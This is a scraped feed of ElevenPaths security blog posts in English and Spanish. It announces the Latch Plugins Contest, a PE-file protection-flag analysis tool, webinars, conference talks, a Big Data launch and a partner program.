    The deadline for entries is 12 December 2016, so don't leave it until the last minute and take part now in Latch Plugin Contest!

    There are a lot of things we can "latch onto". Your smart TV? Your Xbox? A hack to control Facebook sessions? You set the limit.

    Good luck!


    New tool: PESTO, PE (files) Statistical Tool

    $
    0
    0
    One of the fundamental threats in security are vulnerabilities in general and, in particular, being able to exploit them to execute code. Historically, dozens of technologies have been developed to mitigate exploits in Windows, creating barriers for stopping a vulnerability ending up in a code execution. Many of this countermeasures or barriers need the "to-be-protected binary" to be compiled with a particular option enabled for the protection to be real. PESTO PE(files) Statistical Tool has been created to be able to analyze how and how many files are protected in the operative system.


    PESTO sample of execution

    Description
     
    This is a Python script (that needs to import pefile library) that extracts and saves in a database some PE file security characteristics or flags, searching for every PE binary in a whole directory, and saving results into a database. It checks for architecture flag in the header, and for the following security flags: ASLR, NO_SEH, DEP and CFG. It searches for every PE binary in a whole directory, and saves results into a database. Code is clear enough to modify flags and formats to your own needs.

    More details and flag explanation in here: https://www.slideshare.net/elevenpaths/anlisis-del-nivel-proteccin-antiexploit-en-windows-10

    Functionality

    The script just needs a path and a tag. The program will go through the path and subdirectories searching for .DLL and .EXE files and extracting the flags in the PE header (thanks to pefile python library). The program requires a tag that will be used as a suffix for logs and database filenames, so different analysis can be done in the same directory. The information provided by the script is:
    • Percentage of .DLL and .EXE files with i386, AMD64 or other architecture.
    • Percentage of ASLR, NO_SEH, DEP and CFG flags enabled or disabled in the headers.
    • After finishing the analysis it will prompt to export results in a SQL or CSV format.
    It will create as well a .db file which is a sqlite file with the information collected.

    PESTO is available from our GitHub. Hope you find it useful.

    ElevenPaths Talks: Analizando un protocolo Industrial

    $
    0
    0



    El próximo jueves 13 de octubre nuestro compañero Claudio Caracciolo impartirá la charla Analizando un protocolo Industrial, en el que verificaremos una comunicación entre dos dispositivos con un analizador de protocolos para ver qué sucede con los paquetes, qué tipo de seguridad posee y si es posible realizar ataques o modificaciones a nivel de red como se planteó en la temporada 1.

    La duración de la charla de Claudio será de unos 30 minutos, divididos entre 20 y 25 minutos de exposición y de 5 a 10 minutos de preguntas y respuestas. El horario de la charla será a las 15.30h (Madrid) y estará disponible al termina ésta en nuestro canal de YouTube. La ponencia se llevará a cabo por Hangouts y se impartirá en castellano.

    Si quieres saber más acerca del tema, no dudes en pasarte por nuestra Comunidad, donde nuestros compañeros hablan sobre éste y otros temas de interés en el mundo de la Seguridad. Puedes consultar el calendario de talks para ver los webcasts que aún quedan por celebrarse. Recuerda, tienes una cita el próximo 13 de octubre a las 15.30h (Madrid). Para registrarte debes usar el siguiente formulario de ElevenPaths Talks.

    Más información en:
    talks.elevenpaths.com

    Latch Plugins Contest: ¡recuerda la historia!

    $
    0
    0

    La semana pasada desde ElevenPaths convocamos una nueva edición del concurso Latch Plugins Contest. El concurso con que el puedes ganar hasta 5.000 dólares, recuerda que lo que se premia es la imaginación, talento, creatividad y solución aportada con Latch.

    Todo empezó en 2014 cuando, tras un problemilla en uno de los golpes de ElevenPaths, Chema Alonso pidió vuestra ayuda premiando con una recompensa económica a aquel que consiguiera hacer el mejor Plugin para Latch. Visto el interés generado y el talento existente se volvió a lanzar en 2015 obteniendo como resultado proyectos muy interesantes que puedes conocer en nuestro blog.


    Si quieres conocer todos los pasos a seguir para inscribirse en el concurso, visita nuestra Comunidad donde explicamos cómo participar y puedes encontrar trucos, consejos, así como unirte a la conversación sobre Latch Plugins Contest. Además, si tienes alguna duda y deseas conocer toda la mecánica del concurso puedes consultar las bases legales.


    Accede al Github de ElevenPaths donde puedes conocer los plugins desarrollados hasta la fecha, y su documentación. Recuerda que todos los SDK de Latch son Open Source, así como el 99% de los plugins disponibles de Latch. Desde la web de Latch puedes acceder a toda la información de la API. La integración de Latch con las aplicaciones es muy sencilla, y en nuestro canal de Youtube dispones de gran cantidad de contenido para que puedas probarlo.

    Recuerda que el plazo del concurso acaba el día 12 de diciembre de 2016, ¡saca tu lado más hack y participa ya!




    También te puede interesar:
    Los plugins de Latch que se llevaron los dólares y más hacks
    ¡Ya tenemos a los ganadores de nuestros concursos de talento!
    Latch para Jenkins, Latch para IoT y 20 plugins más
    Un "hack" con Latch para controlar accesos a Facebook


    Latch Plugins Contest: Remember the story!

    $
    0
    0
    Last week ElevenPaths launched a new edition of the Latch Plugins Contest,where you can win up to 5,000 dollars. But remember, what we're looking for is imagination, talent, creativity and a solution provided with Latch.

    It all begin in 2014 when, after a slight problem with an ElevenPaths job, Chema Alonso asked for your help and offered a financial reward to the person who could come up with the best Plugin for Latch. In view of the interest sparked and all the talent out there, a new contest was launched in 2015, giving rise to some very interesting projects that you can discover on our Blog


    If you want to find out how to register for the contest, visit our Community where we explain how to enter and give you some handy tips. You can also join the conversation on the Latch Plugins Contest. And if you want the full low-down on the contest, you can check out the rules.

    To see the plugins developed to date and all the documentation, go to the ElevenPaths GitHub. Remember, all the Latch SDKs are Open Source, as are 99% of the available Latch plugins. The Latch web contains detailed information about the API. Integrating Latch with applications couldn't be easier, and our YouTube channel offers loads of content for you to test it. 

    Remember, the contest deadline is December 12, 2016. Tap into your inner hack and send us your entry!




    *Related content: Winners of the Latch Plugins Contest

    ElevenPaths en la XIV Reunión Española sobre Criptografía y Seguridad de la información (RECSI)

    $
    0
    0
    Los aficionados a la criptografía y seguridad informática en general tienen una cita en la XIV Reunión Española sobre Criptografía y Seguridad de la información (RECSI) que se celebrará en Mahón, en las Islas Baleáres del 26 al 28 de octubre.



    La conferencia RECSI, de celebración bienal, es una de las conferencias más antiguas y de prestigio en España. Una conferencia que reúne a expertos de mundos dispares: en esta edición se profundizará en multitud de temas que irán desde la seguridad en dispositivos móviles hasta el criptoanálisis, pasando por protocolos criptográficos, seguridad en redes, nuevas amenazas y mecanismos de defensa, privacidad, etc.

    En esta edición, ElevenPaths presenta un trabajo fruto del departamento de investigación y laboratorio:
    • HSTS y HPKP: Un estudio cuantitativo y cualitativo de su implementación en servidores (Carmen Torrano, Sergio de Los Santos y Antonio Guzmán).

    En esta ponencia se hablará sobre la implementación de HPKP y HSTS en los servidores actuales, no solo desde un punto de vista cuántitivo (quién lo implementa) sino además cualitativo, (cómo se implementa), lo que permite ahondar en errores y problemas de configuración conocidos.

    Fruto de esta investigación se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths.




    20 de octubre: Comienza el viaje hacia Data-Driven

    $
    0
    0

    La importancia del Big Data en la toma de decisiones en el lanzamiento de la nueva unidad de Big Data B2B.



    En la era digital en la que vivimos, estamos invadidos de datos. Cada día recibimos y generamos millones de datos que se pierden en el universo digital. El reto actual consiste en sacar el máximo partido a ese volumen de información en cada aspecto de nuestra vida, tanto personal como profesional. En el terreno empresarial, las organizaciones deben de considerar esos datos como una prioridad para la toma de decisiones estratégicas. Sin embargo, muchas empresas no se han actualizado o no tienen los medios necesarios, y siguen sin aprovechar las oportunidades que todos esos datos pueden generar.

    Desde Telefónica, nuestros compañeros de la unidad de CDO (Chief Data Office) quieren cambiar esto. Para ello, el próximo jueves día 20 de octubre es el gran día en el que lanzarán una nueva unidad de Big Data B2B. El gran lanzamiento tendrá lugar en el Auditorio de Distrito Telefónica a las 15:30, y en él se presentarán las soluciones y servicios que Telefónica ofrece a sus clientes en materia de Big Data, contando con experiencia en áreas como Ingeniería de Datos, Herramientas e Infraestructura, Business Insights y Ciencia de Datos.



    El evento contará con ponencias de la mano de Chema Alonso (CDO), Elena Gil (Directora Global de Big Data B2B), José Luis Gilpérez (Director de Defensa, Seguridad y Big Data para España) y Carme Artigas (CEO de Synergic Partners), que desvelarán las claves para convertir una empresa en data-driven y su nueva marca. También se presentarán algunos casos de éxito de Europa y Latinoamérica para mostrar cómo pueden ofrecer un servicio extremo a extremo a las organizaciones que aspiran a transformar sus datos en un activo clave.

    Podéis encontrar la agenda del evento aquíy además podréis seguir las ponencias en directo por streaming. Nos vemos el jueves.


    ElevenPaths Talks: ¿Qué es el Blockchain y por qué puede cambiar el mundo?

    $
    0
    0



    El próximo jueves 20 de octubre nuestro compañero Rames Sarwat impartirá la charla ¿Qué es el Blockchain y por qué puede cambiar el mundo?, en el que revelará todos los detalles sobre el tema y dará respuesta a preguntas como ¿puede Blockchain ser implementado en otro ámbitos tecnológicos fuera del BitCoin? ¿es posible pensar en un Blockchain sin firma digital?

    La duración de la charla de Rames será de unos 30 minutos, divididos entre 20 y 25 minutos de exposición y de 5 a 10 minutos de preguntas y respuestas. El horario de la charla será a las 15.30h (Madrid) y estará disponible al termina ésta en nuestro canal de YouTube. La ponencia se llevará a cabo por Hangouts y se impartirá en castellano.

    Si quieres saber más acerca del tema, no dudes en pasarte por nuestra Comunidad, donde nuestros compañeros hablan sobre éste y otros temas de interés en el mundo de la Seguridad. Puedes consultar el calendario de talks para ver los webcasts que aún quedan por celebrarse. Recuerda, tienes una cita el próximo 20 de octubre a las 15.30h (Madrid). Para registrarte debes usar el siguiente formulario de ElevenPaths Talks.

    Más información en:
    talks.elevenpaths.com

    Asiste hoy al evento de OWASP Madrid

    $
    0
    0

    Hoy, miércoles, nuestra compañera Eva Suárez estará en OWASP Madrid presentando la charla ‘Show me the Dork’. Junto a Manuel García Cárdenas, mostrarán una plataforma que han desarrollado, la cual recolecta información a través de todo tipo de dorks. 

    En relación con el evento, hay que indicar que la guía 4.0 de OWASP, muestra una de las primeras pruebas que se realizan en la categoría de recolección de información, la cual es verificar que los aplicativos no posean este tipo de fugas, teniendo como referencia Motores de búsqueda, como puede ser Google.


    La plataforma desarrollada, simplifica este tipo de trabajo, ya que recolecta de fuentes externas todo tipo de dorks, los categoriza, e identifica dominios que estén afectados por estos sirviéndose de motores de búsqueda como Google. De esta forma, desde la herramienta ShowMeTheDork es posible realizar búsquedas por dominio y comprobar si están afectados por dorks.

    Pásate por el evento y disfruta de la siguiente agenda:
    Alejandro Guirao Rodríguez – Haciendo el (Chaos) Monkey
    Roberto Muñoz Fernández – Seguridad en Docker: los básicos
    Eva Suárez y Manuel García Cárdenas – Show me the Dork

    No lo dudes y pásate a ver estas tres grandes ponencias y disfruta del evento de OWASP en Madrid.

    Todo lo que presentamos en Security Innovation Day 2016 (I): Partners Program y Alianzas

    $
    0
    0
    "Let Security Be_", fue el lema de la cuarta edición de Security Innovation Day, que celebramos el pasado 6 de octubre, donde mostramos que nuestro verdadero reto es ofrecer soluciones de seguridad que permitan estar siempre un paso por delante de todo tipo de ataques en la industria del cibercrimen. Por eso, apostamos por la innovación y las alianzas con los grandes players del mercado, como camino hacia un futuro más seguro. A los que compartisteis aquella tarde con nosotros, gracias de nuevo por reservarnos un hueco en vuestra agenda, y a los que no; esperamos contar con vosotros en la próxima edición.

    Juntos somos más fuertes
    Según algunos analistas el mercado mundial de ciberseguridad crecerá en los próximos 5 años a un ritmo estimado entre el 10 y 15 por ciento, generando un gasto en las empresas de un trillón de dólares (un billón europeo).

    Este crecimiento estará principalmente impulsado por el espectacular ritmo de incremento del cibercrimen, la epidemia del Ransomware, el movimiento del malware de PCs hacia los Smartphone, y el previsible despliegue de millones de objetos y sensores conectados a Internet (IoT), todo ello combinado con las legiones que existen de ciberdelincuentes a sueldo, y los cada vez más sofisticados ataques que se producen a empresas, organismos públicos y consumidores.


    Desde ElevenPaths consideramos que debemos estar preparados para poder ofrecer las mejores soluciones de seguridad y confianza de forma global. Por ello, se ha diseñado un nuevo programa de partners a partir de las excelentes experiencias de colaboración realizadas con nuestros partners estratégicos con objeto de ser capaces de colaborar con un mayor número de empresas y organismos.

    El programa denominado ElevenPaths Partner Program (EPP) dispone de un total de 5 categorías diferentes diseñadas para dar cabida a cada tipo de organización con la que colaborar.

    Ilustración 1: Categorías del programa ElevenPaths Partner Program
    Para mejorar y aumentar nuestros productos se han diseñado la categoría de Technology Alliance Partner (TAP) para aquellas empresas que crean tecnologías que pueden ser integradas en nuevos o actuales productos o servicios, y la categoría Research and Development Partner (RDP) para la colaboración con universidades y centros de investigación, con el objetivo de desarrollar nuevos algoritmos y realizar investigaciones de seguridad conjuntas.

    Los productos y servicios que se diseñan en ElevenPaths se comercializan principalmente a través de las operadoras de Telefónica, cuando éstas están presentes en el país, y también a través de Telefónica Internacional Wholesale Services, en aquellos países donde Telefónica no es operador.

    Con objeto de poner estos productos y servicios líderes a disposición del mayor número de empresas, gobiernos y consumidores a nivel global se han definido dos nuevas categorías en el nuevo programa.

    La categoría Telco Security Partner (TSP) permitirá ampliar la actual colaboración con otras Telcos (como Etisalat en Oriente Medio y Turk Telecom en Turkia y parte de Asia) en materia de ciberseguridad permitiendo que dichas empresas puedan hacer llegar a sus clientes dichos productos y servicios compartiendo conocimiento y experiencia para mejorar los servicios.

    La categoría Solutions & Services Partners (SSP) es la nueva categoría donde se espera un mayor crecimiento, para dar cabida bien a empresas expertas en suministrar soluciones verticalizadas a los clientes, o bien empresas integradoras que complementan los productos con servicios profesionales cualificados, para lograr un encaje perfecto con las infraestructuras y aplicaciones de los clientes. Estos partners obtendrán acceso exclusivo a los recursos técnicos y comerciales que le ayudarán a crear nuevas oportunidades, aumentar la rentabilidad y cerrar acuerdos comerciales más rápidamente.

    Mantendremos el programa de alianzas estratégicas bajo la denominación de Global Strategic Alliance Partner (SAP) para continuar la colaboración con este reducido conjunto de empresas globales con las que ElevenPaths colabora más estrechamente mediante la integración bidireccional de tecnologías, planes de comercialización a nivel mundial, investigaciones conjuntas, intercambio de información de inteligencia, acciones comunes de marketing y divulgación de resultados.

    Puedes obtener más información sobre el programa ElevenPaths Partner Program y solicitar tu inscripción en partners.elevenpaths.com. Estamos convencidos que juntos somos más fuertes y podemos llegar mucho más lejos con un partnership basado en el entendimiento, la complementariedad y la confianza.


    La Fuerza radica en la unidad
    Poca gente es capaz de discutir hoy que el futuro de la Seguridad pasa por abrir, cada vez más, vías de colaboración entre empresas y organismos de todo tipo. Unas veces estas colaboraciones se promueven a través de foros internacionales o asociaciones que se ocupan de estandarizar y promover el intercambio de información, amenazas, muestras de malware, etc.


    Sin embargo, la colaboración no puede quedarse simplemente en el nivel informativo. Una de las necesidades críticas en las empresas de hoy es mejorar la integración tecnológica y el incremento del nivel de automatización de los procesos más simples. Estos avances son absolutamente necesarios para,

    1. Mejorar las capacidades de análisis y respuesta, pues no podemos responder con una gestión exclusivamente basada en personas a ataques lanzados por máquinas y totalmente automatizados
    2. Que los analistas de ciberseguridad dediquen la mayor parte de su tiempo a la investigación y resolución de los incidentes relevantes y no a estar limpiando de eventos una miríada de consolas de todas las tecnologías desplegadas durante años y años.

    En ElevenPaths comenzamos hace 18 meses un programa de Alianzas Estratégicas dirigido a la integración de nuestros productos con las tecnologías de las empresas líderes del mercado de la Seguridad. No fue tarea fácil y los lazos que hemos establecido con cada una de estas compañías han tenido orígenes diferentes (un proyecto estrella, afinidad, confianza, ...) y la tensión que soportan también es variable porque cada acuerdo que hemos firmado ha requerido un alto grado de personalización.


    Y si establecer alianzas no es sencillo, mantenerlas es mucho más complicado. Sin embargo, a pesar de las dificultades, hemos conseguido incorporar en nuestro programa a 10 compañías que han apostado por unirse a nosotros en un modelo de integración tecnológica que, con nuestra plataforma SANDAS como base común, mejora la visibilidad en los procesos de Gestión de la CiberSeguridad y el GRC de una compañía, además de facilitar la automatización de procesos con múltiples tecnologías.

    Es una apuesta decidida por nuestras tecnologías a la que ahora queremos incorporar a todo tipo de compañías con nuestro nuevo ElevenPaths Partner Program.

    Rames Sarwat, ElevenPaths Head of Partnerships and CSA Manager
    y Francisco Ginel, ElevenPaths VP of Strategic Alliances


    *Próximamente iremos publicando el resto de la serie de todo lo que vimos en Security Innovation Day 2016, ¡estad atentos! 


    Viewing all 1287 articles
    Browse latest View live